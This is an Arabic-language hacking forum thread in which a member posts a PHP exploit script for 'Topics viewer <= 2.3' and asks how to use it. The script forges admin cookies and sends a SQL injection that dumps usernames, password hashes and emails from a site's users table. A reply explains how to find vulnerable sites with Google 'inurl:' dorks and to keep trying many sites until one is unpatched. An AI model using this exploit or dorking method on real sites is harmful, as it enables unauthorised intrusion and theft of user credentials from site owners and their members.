التواصل المباشر مع الادارة والاعضاء القدامى من خلال قناة التلغرام



العودة   :: vBspiders Professional Network :: > [ ::. خدماتنـــــا .:: ] > جـــ'ابات العناكــ'ب
تحديث الصفحة [استفسار] حول ثغرة Topics viewer <= 2.3 Authentication Bypass & SQL Injection
التعليمات التقويم مشاركات اليوم البحث

إضافة رد
 
LinkBack أدوات الموضوع انواع عرض الموضوع
قديم 07-05-2012, 09:12 AM   رقم المشاركة : 1 (permalink)
معلومات العضو
 
الصورة الرمزية Abo MalaK
 

 
 
إحصائية العضو







Abo MalaK غير متواجد حالياً

إرسال رسالة عبر MSN إلى Abo MalaK

 

 

إحصائية الترشيح

عدد النقاط : 10
Abo MalaK is on a distinguished road
مطلوب غير مجاب: حول ثغرة Topics viewer <= 2.3 Authentication Bypass & SQL Injection

السلام عليكم ورحمة الله وبركاته

المهم

حصلت ثغره جديده توها نزلت
http://pastebin.com/KqFCfyc3
فهمت تقريبآ 60%

class="smallfont">اقتباس
<?

$host="http://www.el3drabyad.com/"; //ضع الموقع المصاب بدل هذا الموقع واستعرض الملف من المتصفح

$ch = curl_init();

curl_setopt($ch, CURLOPT_URL, $host."/modcp/rmv_topic_pop.php?id=-1+/*!union*/+/*!SELeCT*/+1,group_concat(u_name,0x3a,u_mpass,0x3a,u_email), 3,4,5,6,7,8,9,10,11,12+/*!frOm*/+users--");

curl_setopt($ch, CURLOPT_******, "admin=ahwak2000;mod=ahwak2000;");

curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 0);

curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);

$buffer = curl_exec($ch);

if(strpos($buffer,"style.css"))
{

echo "<br> [-]---------------------------------------------[-]<br>";

$reg = '#<li .*>.*:(.*?)؟</span></li>#Us';

preg_match($reg,$buffer,$ahwak);

$s1=explode(",",$ahwak[1]);
$i=1;

foreach($s1 as $ayrik){

print "<br> <b>[$i] ".trim($ayrik)."</b><br>";

$i++;

}

echo "<br> [-]---------------------------------------------[-]<br><b><font color=red>z.u5@hotmail.com</font></b>";

}

?>

طيب هذا الاستغلال تمام،!!
الي مافهمته هل استعرضه بمتداد html>?
+
دوركت لها لاني حآولت بها ماقدرت
+
كيف اعرف هل الموقع مصاب بالثغره ام لا

بنتضآركم

Vspan style="font-weight: bold; color: #ff0000;"Cydv l[hf:VLspanC p,g eyvm Topics viewer <= 2>3 Authentication Bypass & SQL Injection

التوقيع

استغفر الله العظيم
استغفر الله العظيم من كل فرض تركـــــتــه
استغفر الله العظيم من كل انسان ظلـمـتــــه
استغفر الله العظيم من كل صالح جـفــوتــــه
استغفر الله العظيم من كل ظالم صاحـــبتــه
استغفر الله العظيم من كل بـــر أجـــــلتـــــه
استغفر الله العظيم من كل ناصح أهنــتـــــه
++
دعوآتكم لي،

 

   

رد مع اقتباس
قديم 07-05-2012, 07:00 PM   رقم المشاركة : 2 (permalink)
معلومات العضو
 
الصورة الرمزية mido868
 

 
 
إحصائية العضو






mido868 غير متواجد حالياً

إرسال رسالة عبر Yahoo إلى mido868

 

 

إحصائية الترشيح

عدد النقاط : 16
mido868 is on a distinguished road
افتراضي رد: حول ثغرة Topics viewer <= 2.3 Authentication Bypass & SQL Injection

اقتباس
مشاهدة المشاركة المشاركة الأصلية كتبت بواسطة Abo MalaK
السلام عليكم ورحمة الله وبركاته

المهم

حصلت ثغره جديده توها نزلت
http://pastebin.com/KqFCfyc3
فهمت تقريبآ 60%


طيب هذا الاستغلال تمام،!!
الي مافهمته هل استعرضه بمتداد html>?
+
دوركت لها لاني حآولت بها ماقدرت
+
كيف اعرف هل الموقع مصاب بالثغره ام لا

بنتضآركم

اكيد اخى العزيز الموقع ينتهى مثل هذا
.php?id=

ثانيا الاسكربت المصاب الذى ستبحث عنه
/modcp/rmv_topic_pop.php?

ويمكنك ان تقوم بعمل التالى
inurl:
ثم تضع بعدها اسم الاسكربت المصاب فى محرك البحث جوجل ثم تبدأ بالاختبار على عدة مواقع
وملحوظة لا تيأس اذا وجدت عديد من المواقع تم ترقيع الثغرة منها واستمر فى المحاولة وتذكر دائما ان الصبر احد الاركان الاساسية للنجاح
التوقيع

علمتنى الحياة ألا اكون كالذين كتموا العلم فمات معهم
إذا عندك إقتراح وتريد تنفيذه (لو عندك اقتراح ،اكتبه هنا)
http://www.vbspiders.com/vb/t67563.html
AUHT

 

   

رد مع اقتباس
قديم 07-06-2012, 03:48 AM   رقم المشاركة : 3 (permalink)
معلومات العضو
 
الصورة الرمزية Abo MalaK
 

 
 
إحصائية العضو







Abo MalaK غير متواجد حالياً

إرسال رسالة عبر MSN إلى Abo MalaK

 

 

إحصائية الترشيح

عدد النقاط : 10
Abo MalaK is on a distinguished road
افتراضي رد: حول ثغرة Topics viewer <= 2.3 Authentication Bypass & SQL Injection

شآكر لتفاعلك ،

بس الدوركت مستحيل يكون

/modcp/rmv_topic_pop.php?

لآن ماطلع ولا موقع،

بعدين الاستغلال هل احفظ الثغره بصيغة html واستغل؟

التوقيع

استغفر الله العظيم
استغفر الله العظيم من كل فرض تركـــــتــه
استغفر الله العظيم من كل انسان ظلـمـتــــه
استغفر الله العظيم من كل صالح جـفــوتــــه
استغفر الله العظيم من كل ظالم صاحـــبتــه
استغفر الله العظيم من كل بـــر أجـــــلتـــــه
استغفر الله العظيم من كل ناصح أهنــتـــــه
++
دعوآتكم لي،

 

   

رد مع اقتباس
قديم 07-07-2012, 12:45 AM   رقم المشاركة : 4 (permalink)
معلومات العضو
 
الصورة الرمزية Abo MalaK
 

 
 
إحصائية العضو







Abo MalaK غير متواجد حالياً

إرسال رسالة عبر MSN إلى Abo MalaK

 

 

إحصائية الترشيح

عدد النقاط : 10
Abo MalaK is on a distinguished road
افتراضي رد: حول ثغرة Topics viewer <= 2.3 Authentication Bypass & SQL Injection

الآستغلال لحد الآن ماوصلت له،

هل اعدل على كود الثغره ام انفذ امر
php rmv_topic_pop.php site.com/path/

؟

التوقيع

استغفر الله العظيم
استغفر الله العظيم من كل فرض تركـــــتــه
استغفر الله العظيم من كل انسان ظلـمـتــــه
استغفر الله العظيم من كل صالح جـفــوتــــه
استغفر الله العظيم من كل ظالم صاحـــبتــه
استغفر الله العظيم من كل بـــر أجـــــلتـــــه
استغفر الله العظيم من كل ناصح أهنــتـــــه
++
دعوآتكم لي،

 

   

رد مع اقتباس
إضافة رد

مواقع النشر (المفضلة)

« الموضوع السابق | الموضوع التالي »

تعليمات المشاركة
لا تستطيع إضافة مواضيع جديدة
لا تستطيع الرد على المواضيع
لا تستطيع إرفاق ملفات
لا تستطيع تعديل مشاركاتك
BB code is متاحة
كود [IMG] متاحة
كود HTML معطلة
Trackbacks are متاحة
Pingbacks are متاحة
Refbacks are متاحة
الانتقال السريع


الساعة الآن 01:52 AM

:: vBspiders.Com :: RSS Feeds - راسلـنا - :: vBspiders.Com :: - الأعلى

[ vBspiders.Com Network ]

SEO by vBSEO 3.6.0